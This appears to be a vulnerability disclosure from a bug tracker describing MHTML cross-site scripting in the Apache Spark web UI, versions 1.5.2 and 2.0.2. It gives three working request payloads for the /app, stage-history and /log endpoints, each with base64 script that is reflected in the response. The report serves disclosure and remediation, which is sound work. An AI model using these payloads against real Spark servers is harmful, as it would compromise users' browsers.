Details
Major Description
Using IBM Security AppScan Standard, we discovered several easy to recreate MHTML cross site scripting vulnerabilities in the Apache Spark Web GUI application and these vulnerabilities were found to exist in Spark version 1.5.2 and 2.0.2, the two levels we initially tested. Cross-site scripting attack is not really an attack on the Spark server as much as an attack on the end user, taking advantage of their trust in the Spark server to get them to click on a URL like the ones in the examples below. So whether the user could or could not change lots of stuff on the Spark server is not the key point. It is an attack on the user themselves. If they click the link the script could run in their browser and comprise their device. Once the browser is compromised it could submit Spark requests but it also might not.
Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
HTTP/1.1Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related;
boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
</div>Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
Type:%20multipart/related;%20boundary=_AppScan%0d%0a-_AppScan%0d%0aContent
Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
k.pageSize=100 HTTP/1.1Excerpt from response: Content-Type: multipart/related;
boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
Type:%20multipart/related;%20boundary=_AppScan%0d%0a-_AppScan%0d%0aContent
Location:foo%0d%0aContent-Transfer-
Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
eLength=0 HTTP/1.1Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
Type: multipart/related; boundary=_AppScan
--_AppScan
Content-Location:foo
Content-Transfer-Encoding:base64
PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+Result: In the above payload the BASE64 data decodes as:
<html><script>alert("XSS")</script></html>
security@apache was notified and recommended a PR.
